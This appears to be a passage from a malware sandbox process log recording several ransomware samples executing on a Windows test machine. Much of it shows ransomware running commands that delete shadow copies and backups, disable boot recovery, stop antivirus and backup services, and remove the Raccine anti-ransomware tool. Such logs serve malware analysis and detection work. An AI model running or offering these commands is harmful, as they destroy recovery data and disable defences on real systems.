C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\e0homvul.cmdline"4⤵PID:8468
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC5303284805C4DF7B8AF769157999DC.TMP"5⤵PID:11548
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rix9pwle.cmdline"4⤵PID:9168
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAEC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCB76653A439F42A8B3F14CB29EF0F866.TMP"5⤵PID:13248
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0bcm0xsh.cmdline"4⤵PID:3408
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1116.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD541C332797475782C3B6FB6B0ECA.TMP"5⤵PID:8280
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kawhjjkq.cmdline"4⤵PID:9956
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A9C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1ABA723DCAE240EC83A73E7BEBEE8BA3.TMP"5⤵PID:4144
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kz2_bzh7.cmdline"4⤵PID:13988
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES20E5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7FEA3E656D8B4A108C3D193DC215F1ED.TMP"5⤵PID:216
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vx_ibngo.cmdline"4⤵PID:14388
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES273E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc951D72E6E90C4F3A9D8DE3217AAD691E.TMP"5⤵PID:5864
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kru_i34n.cmdline"4⤵PID:6444
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E24.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc69CC4293CEB2447DB9E414768FD4C3AB.TMP"5⤵PID:5672
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1d543e2d.cmdline"4⤵PID:10164
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3690.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD253D481D6D54BEE86934792CBFD43D.TMP"5⤵PID:13892
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\-qz-zuvh.cmdline"4⤵PID:7184
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3B53.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA2B8F2436CDD40A2B5CCADAEA31930BF.TMP"5⤵PID:8132
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k7x3z7w2.cmdline"4⤵PID:9544
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES443C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc11C9641EA9B84322B1CD5DC1954E436.TMP"5⤵PID:7116
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jylv_i6i.cmdline"4⤵PID:11764
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49CA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC6FE2D2B9F6648AFBBD3FA57A2428594.TMP"5⤵PID:11644
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\incwkq99.cmdline"4⤵PID:11088
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES513C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc91C8280683F1453DBFB439A15D3EEEA0.TMP"5⤵PID:2504
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6ky1ogbp.cmdline"4⤵PID:9808
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES561E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc6FCBE62D52F24E9C8C5CB6E74DA88E.TMP"5⤵PID:13448
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\9zas7c8n.cmdline"4⤵PID:11948
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C77.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4F05E5EF887B4F70AC1F6631ED654DA9.TMP"5⤵PID:6004
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3qbsufxy.cmdline"4⤵PID:9628
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES633D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc34EB6983D434C4E95FCDBFF280D32.TMP"5⤵PID:14292
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bezwlvyt.cmdline"4⤵PID:12092
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\tbmraca_.cmdline"4⤵PID:6040
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80E7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc5E804CD06674C288AF9A41DF9C26442.TMP"5⤵PID:12832
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\jyavmfaj.cmdline"4⤵PID:11100
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A6D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcEC72D116D174F7F9DCB2F1A1823375D.TMP"5⤵PID:10824
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pu1d3niy.cmdline"4⤵PID:8372
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9143.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF2F4473AE914481DB2A9B57FF7D27954.TMP"5⤵PID:6452
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6krtrouy.cmdline"4⤵PID:5292
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9C5E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc884E4660E0F1490089E98FDD92E55D4.TMP"5⤵PID:9236
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qsytpyym.cmdline"4⤵PID:12248
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA373.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc79CA78FCD87B43BFACE57E155B2DF1D0.TMP"5⤵PID:5692
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sc_x1-d5.cmdline"4⤵PID:14868
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB81.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA21AC95164074E8D9C7127261C89A75E.TMP"5⤵PID:6712
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\51duptx_.cmdline"4⤵PID:14196
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2E4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD803441210AC4219883CA22293911627.TMP"5⤵PID:11580
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rynmdf3_.cmdline"4⤵PID:13968
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA47.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc260A3607719B423C9219BBCB448F5BAA.TMP"5⤵PID:7508
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hkjkedk5.cmdline"4⤵PID:10648
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF29.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2C82591D1FF14383BCE550814D75FAAE.TMP"5⤵PID:4336
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\6zouplm-.cmdline"4⤵PID:4488
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Cryptor.gen-693b60311e8085f10849236ff2ae6cf074c577f2cd8c325882049b873ec8629b.exeHEUR-Trojan-Ransom.MSIL.Cryptor.gen-693b60311e8085f10849236ff2ae6cf074c577f2cd8c325882049b873ec8629b.exe3⤵PID:4872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 11804⤵
- Program crash
PID:3768
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6a280e736f87f45cf54e75b1cae457cce8946b0e018c524c480183f38afa8b50.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-6a280e736f87f45cf54e75b1cae457cce8946b0e018c524c480183f38afa8b50.exe3⤵PID:868
-
C:\files\1.exe"C:\files\1.exe"4⤵PID:4428
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Encoder.gen-6fd34eae74f8830037e6d3af76d4e4f24b0f28883a44c4fec579c5388913a39d.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-6fd34eae74f8830037e6d3af76d4e4f24b0f28883a44c4fec579c5388913a39d.exe3⤵PID:532
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Encoder.gen-b54ba0258512b23f22ef05c2697ef598f3559d4c60697b661ffab28c8c0e5fa3.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-b54ba0258512b23f22ef05c2697ef598f3559d4c60697b661ffab28c8c0e5fa3.exe3⤵PID:2428
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.MSIL.Foreign.gen-1628073f4f208304b6160edcc7c99b0eb0598dd0013c324ddd6b9999071c6b2b.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-1628073f4f208304b6160edcc7c99b0eb0598dd0013c324ddd6b9999071c6b2b.exe3⤵PID:4396
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Agent.gen-cd21ead0679e614f1c3eb74d7c9a6e184115c8065fea879e644707f580402d8d.exeHEUR-Trojan-Ransom.Win32.Agent.gen-cd21ead0679e614f1c3eb74d7c9a6e184115c8065fea879e644707f580402d8d.exe3⤵PID:5004
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.CryFile.gen-a830a4a4973acc8df892a95870ba73933cc428f9e2da64436e31686a7a786155.exeHEUR-Trojan-Ransom.Win32.CryFile.gen-a830a4a4973acc8df892a95870ba73933cc428f9e2da64436e31686a7a786155.exe3⤵PID:4368
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-a54408b8e9aa1463e1f86d44a42986dddce59429ccd4aa188b754c114f6c37b9.exeHEUR-Trojan-Ransom.Win32.GandCrypt.gen-a54408b8e9aa1463e1f86d44a42986dddce59429ccd4aa188b754c114f6c37b9.exe3⤵PID:4432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4432 -s 4324⤵
- Program crash
PID:1164
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.exeHEUR-Trojan-Ransom.Win32.Generic-5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.exe3⤵PID:1712
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵PID:7628
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-7033dbc7c2d282bae09c56c1b23b55a06ec172740fc35395f34763cf8c6623e8.exeHEUR-Trojan-Ransom.Win32.Generic-7033dbc7c2d282bae09c56c1b23b55a06ec172740fc35395f34763cf8c6623e8.exe3⤵PID:4708
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵PID:3280
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵PID:5296
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive4⤵PID:6468
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-75768b049c2604de6db876b29e47e570baba75850cc322f1abe96331abfa975f.exeHEUR-Trojan-Ransom.Win32.Generic-75768b049c2604de6db876b29e47e570baba75850cc322f1abe96331abfa975f.exe3⤵PID:4876
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:3312
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵PID:5712
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:1668
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest4⤵PID:2256
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No4⤵PID:1244
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:4824
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:3408
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:4164
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:2964
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest4⤵PID:3552
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No4⤵PID:5188
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:5280
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:5452
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wmic.exe SHADOWCOPY /nointeractive4⤵PID:5644
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive5⤵PID:6760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP4⤵PID:5704
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest4⤵PID:5848
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} recoveryenabled No4⤵PID:5884
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵PID:5968
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet4⤵PID:5992
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-a8117abc27d70f18eaec3b6569e105edb2604c81b6e33dc81719e3e6247f5154.exeHEUR-Trojan-Ransom.Win32.Generic-a8117abc27d70f18eaec3b6569e105edb2604c81b6e33dc81719e3e6247f5154.exe3⤵PID:5072
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y4⤵PID:1008
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y5⤵PID:2388
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y4⤵PID:5208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y5⤵PID:5724
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y4⤵PID:1772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y5⤵PID:6684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y4⤵PID:5316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y5⤵PID:5720
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y4⤵PID:6168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y5⤵PID:2300
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
PID:5904
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
PID:6908
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
PID:7368
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
PID:7780
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:7816
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:4888
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:8976
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet4⤵
- Interacts with shadow copies
PID:7304
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB4⤵
- Interacts with shadow copies
PID:8524
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded4⤵
- Interacts with shadow copies
PID:5628
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB4⤵
- Interacts with shadow copies
PID:8668
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded4⤵
- Interacts with shadow copies
PID:8332
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB4⤵
- Interacts with shadow copies
PID:11336
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded4⤵
- Interacts with shadow copies
PID:13836
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB4⤵
- Interacts with shadow copies
PID:2876
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded4⤵
- Interacts with shadow copies
PID:10572
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB4⤵
- Interacts with shadow copies
PID:9816
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded4⤵
- Interacts with shadow copies
PID:10636
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB4⤵
- Interacts with shadow copies
PID:9312
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded4⤵
- Interacts with shadow copies
PID:12152
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet4⤵
- Interacts with shadow copies
PID:5648
-
-
-
C:\Users\Admin\Desktop\00440\HEUR-Trojan-Ransom.Win32.Generic-e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exeHEUR-Trojan-Ransom.Win32.Generic-e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.exe3⤵PID:4940
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe4⤵
- Kills process with taskkill
PID:6244
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F4⤵PID:7144
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F4⤵
- Modifies registry key
PID:4496
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F4⤵PID:6264
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto4⤵
- Launches sc.exe
PID:4864
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto4⤵
- Launches sc.exe
PID:1980
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto4⤵
- Launches sc.exe
PID:312
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto4⤵
- Launches sc.exe
PID:7860
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
PID:7920
-
-
